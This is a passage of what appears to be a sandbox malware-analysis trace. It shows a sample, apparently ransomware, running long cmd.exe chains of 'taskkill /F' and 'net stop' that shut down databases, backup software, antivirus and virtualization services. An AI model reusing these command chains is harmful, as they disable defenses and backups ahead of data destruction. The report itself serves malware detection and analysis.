@taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BackupExec.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Att.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mdm.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BackupExecManagementService.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM bengine.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM benetns.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beserver.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pvlsvr.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM bedbg.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RemoteAssistProcess.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarMoniService.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoodGameSrv.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarCMService.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TsService.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoodGame.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarServerView.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IcafeServicesTray.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BsAgent_0.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ControlServer.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DisklessServer.exe /F4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pg_ctl.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM rcrelay.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SogouImeBroker.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CCenter.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ScanFrm.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM d_manage.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RsTray.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wampmanager.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RavTray.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mssearch.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlmangr.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM msftesql.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SyncBaseSvr.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM oracle.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TNSLSNR.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SyncBaseConsole.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM aspnet_state.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AutoBackUpEx.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM redis-server.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MySQLNotifier.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM oravssw.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fppdis5.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM His6Service.exe /F4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ThunderPlatform.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM iexplore.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-agent.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-agent-daemon.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM eSightService.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cygrunsrv.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wrapper.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM nginx.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM node.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sshd.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-tray.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM iempwatchdog.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlwriter.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM php.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "notepad++.exe" /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "phpStudy.exe" /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM OPCClient.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM navicat.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SupportAssistAgent.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SunloginClient.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SOUNDMAN.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM WeChat.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TXPlatform.exe /F4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlservr.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM httpd.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM java.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fdhost.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fdlauncher.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM reportingservicesservice.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM softmgrlite.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlbrowser.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ssms.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vmtoolsd.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM baidunetdisk.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM yundetectservice.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ssclient.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNAupdaemon.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxEM.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RAVCp164.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxHK.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxTray.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM 360bdoctor.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNCEFExternal.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM PrivacyIconClient.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UIODetect.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AutoDealService.exe /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""3⤵
-
C:\Windows\SysWOW64\net.exenet stop UIODetect4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UIODetect5⤵
-
C:\Windows\SysWOW64\net.exenet stop VMwareHostd4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMwareHostd5⤵
-
C:\Windows\SysWOW64\net.exenet stop TeamViewer84⤵
- Discovers systems in the same network
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TeamViewer85⤵
-
C:\Windows\SysWOW64\net.exenet stop VMUSBArbService4⤵
-
